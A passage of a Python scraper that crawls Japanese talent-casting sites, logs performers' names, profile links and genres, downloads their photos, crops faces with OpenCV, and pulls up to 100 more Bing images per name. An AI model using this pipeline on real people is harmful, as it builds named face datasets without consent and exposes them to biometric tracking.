clickSelector(fox, 'input[type="checkbox"][value="スポーツ"]')
clickSelector(fox, 'input[type="checkbox"][value="話す仕事"]')
clickSelector(fox, 'input[type="checkbox"][value="モデル"]')
# 年齢
clearAndSendKeys(fox, 'age_min', str(AGE_MIN))
clearAndSendKeys(fox, 'age_max', str(AGE_MAX))
# 「すべての条件を併せて検索」
clickSelector(
fox, 'input[type="image"][src="img/top_search_btn.jpg"]')
# 検索結果1ページ目
time.sleep(1)
WebDriverWait(fox, WAITING_TIME).until(
EC.presence_of_element_located((By.XPATH, '//body')))
print('\tcollect() body', file=logfile, flush=True)
source = fox.page_source
bs = BeautifulSoup(source, 'lxml')
print('\tcollect() bs', file=logfile, flush=True)
searchnavi_total = bs.find_all(
'span', class_=re.compile('searchnavi_total'))
if len(searchnavi_total) == 0:
return
count_all = int(searchnavi_total[0].text)
last_page = -((-1 * count_all) // PERSONS_PER_PAGE) # 切り上げ
for i in range(last_page):
print('\tcollect() page: {} {} {} {}'.format(
i, last_page, count_all, datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')), file=logfile, flush=True)
tables = bs.find_all(
'table', id=re.compile('search-results'))
if len(tables) > 0:
table = tables[0]
trs = table.find_all('tr')
if len(trs) > 0:
for tr in trs:
name = ''
profile_page = ''
try:
# 個人
links = tr.find_all(
'a', class_=re.compile('talent'))
if len(links) > 0:
link = links[0]
name = str(link.text).replace(' ', '')
profile_page = baseUri + \
'/search/' + link.get('href')
genre = tr.findAll(
'td')[3].text.replace('\n', '')
result_names.append(name + ' ' + genre)
# データファイルに出力
print('{}\t\t{}\t\t{}'.format(name, profile_page, genre),
file=datafile, flush=True)
try:
imgs = tr.find_all('img')
if len(imgs) > 0:
download_img(
baseUri + imgs[0].get('src'), name)
except:
pass
except Exception as e:
print(e, file=logfile, flush=True)
# 次のページに行く
try:
clickLink(fox, '次のページ')
time.sleep(1)
WebDriverWait(fox, WAITING_TIME).until(
EC.presence_of_element_located((By.XPATH, '//body')))
print('\tcollect() body', file=logfile, flush=True)
source = fox.page_source
bs = BeautifulSoup(source, 'lxml')
print('\tcollect() bs', file=logfile, flush=True)
except:
break
# talemecasting-next
baseUri = baseUris[1]
targetUri = targetUris[1]
print('\tcollect() baseUri: {} {}'.format(
baseUri, datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')), file=logfile, flush=True)
print('\tcollect() targetUri: {} {}'.format(
targetUri, datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')), file=logfile, flush=True)
fox.get(targetUri)
time.sleep(1)
WebDriverWait(fox, WAITING_TIME).until(
EC.presence_of_element_located((By.XPATH, '//body')))
print('\tcollect() body', file=logfile, flush=True)
source = fox.page_source
bs = BeautifulSoup(source, 'lxml')
print('\tcollect() bs', file=logfile, flush=True)
total = bs.find_all(
'span', class_=re.compile('required'))
if len(total) == 0:
return
count_all = int(total[0].text)
last_page = -((-1 * count_all) // PERSONS_PER_PAGE) # 切り上げ
for i in range(last_page):
print('\tcollect() page: {} {} {} {}'.format(
i, last_page, count_all, datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')), file=logfile, flush=True)
uls = bs.find_all('ul', id=re.compile('display-image'))
if len(uls) > 0:
ul = uls[0]
lis = ul.find_all('li')
if len(lis) > 0:
for li in lis:
name = ''
profile_page = ''
try:
# 個人
divs = li.find_all(
'div', class_='talent-head-img')
summaries = li.find_all(
'div', class_='talent-summary')
if len(divs) > 0:
div = divs[0]
smr = summaries[0]
imgs = div.find_all('img')
if len(imgs) > 0:
img = imgs[0]
name = str(img.get(
'alt')).replace(' ', '')
download_img(img.get('src'), name)
links = li.find_all('a')
if len(links) > 0:
link = links[0]
profile_page = baseUri + \
link.get('href')
genre = smr.find_all(
'div', class_='genre')[0].text.replace('\n', '')
result_names.append(
name + ' ' + genre)
# データファイルに出力
print('{}\t\t{}\t\t{}'.format(name, profile_page, genre),
file=datafile, flush=True)
except Exception as e:
print(e, file=logfile, flush=True)
# 次のページに行く
try:
clickClassName(fox, 'next')
time.sleep(1)
WebDriverWait(fox, WAITING_TIME).until(
EC.presence_of_element_located((By.XPATH, '//body')))
print('\tcollect() body', file=logfile, flush=True)
source = fox.page_source
bs = BeautifulSoup(source, 'lxml')
print('\tcollect() bs', file=logfile, flush=True)
except:
break
except Exception as e:
print(e, file=logfile, flush=True)
finally:
# 終了時の後片付け
try:
fox.close()
fox.quit()
print('\tcollect() Done: {}'.format(
datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')), file=logfile, flush=True)
except:
print(e, flush=True)
return result_names
def search(names):
names = list(set(names))
for name in names:
profile_dirpath = os.path.join(PHOTO_DIRPATH, name)
os.makedirs(profile_dirpath, exist_ok=True)
crawler = BingImageCrawler(storage={"root_dir": profile_dirpath})
crawler.crawl(keyword=name, max_num=100)
time.sleep(WAITING_TIME_SEARCH)
def clickClassName(fox, className):
fox.find_element_by_class_name(className).click()
def clickId(fox, id):
fox.find_element_by_id(id).click()
def clickLink(fox, text):
fox.find_element_by_link_text(text).click()
def clickName(fox, name):
fox.find_element_by_name(name).click()
def clickSelector(fox, selector):
fox.find_element_by_css_selector(selector).click()
def clickXpath(fox, xpath):
fox.find_element_by_xpath(xpath).click()
def clearAndSendKeys(fox, name, text):
fox.find_element_by_name(name).clear()
fox.find_element_by_name(name).send_keys(text)
def getFilename(url):
basename = os.path.basename(str(url))
basename = basename.split('?')[0] if ('?' in basename) else basename
return basename
def download_img(url, filename_prefix):
with open(LOG_FILEPATH, 'a', encoding='utf-8') as logfile:
print('\tdownload_img() LOG: {} {} {}'.format(
datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S'), url, filename_prefix), file=logfile, flush=True)
r = requests.get(url, stream=True)
if r.status_code == 200:
print('\tdownload_img() get: {} {} {} 200'.format(
datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S'), url, filename_prefix), file=logfile, flush=True)
with open(os.path.join(PHOTO_DIRPATH, filename_prefix + '_' + getFilename(url)), 'wb') as f:
f.write(r.content)
print('\tdownload_img() write: {} {} {} 200 f'.format(
datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S'), url, filename_prefix), file=logfile, flush=True)
img = imread2(f.name)
print('\tdownload_img() imread2: {} {} {} img f type:{}'.format(
datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S'), url, filename_prefix, type(img)), file=logfile, flush=True)
if img is not None:
print('\tdownload_img() img is not Null: {} {} {}'.format(
datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S'), url, filename_prefix), file=logfile, flush=True)
src_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = faceCascadeClassifier.detectMultiScale(src_gray)
print('\tdownload_img() faces: {} {} {}'.format(
datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S'), url, filename_prefix), file=logfile, flush=True)
for x, y, w, h in faces:
print('\tdownload_img() faces: {} {} {} xywh: {} {} {} {}'.format(
datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S'), url, filename_prefix, x, y, w, h), file=logfile, flush=True)
try:
face = img[y: y + h, x: x + w]
filesplt = os.path.splitext(
os.path.basename(getFilename(url)))
facefile = os.path.join(
PHOTO_DIRPATH, filename_prefix + '_' + filesplt[0] + '_{:04}-{:04}-{:04}-{:04}'.format(y, y + h, x, x + w) + filesplt[1])
imwrite2(facefile, face)
except Exception as e:
print('Exception: {} {}'.format(
datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S'), e), file=logfile, flush=True)
else:
print('\tdownload_img() get: {} {} {} status: {}'.format(
datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S'), url, filename_prefix, r.status_code), file=logfile, flush=True)
if __name__ == '__main__':
with open(LOG_FILEPATH, 'a', encoding='utf-8') as logfile:
print('Start', file=logfile, flush=True)
names = collect()
search(names)
with open(LOG_FILEPATH, 'a', encoding='utf-8') as logfile:
print('Done', file=logfile, flush=True)
| 41.369128 | 190 | 0.480748 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.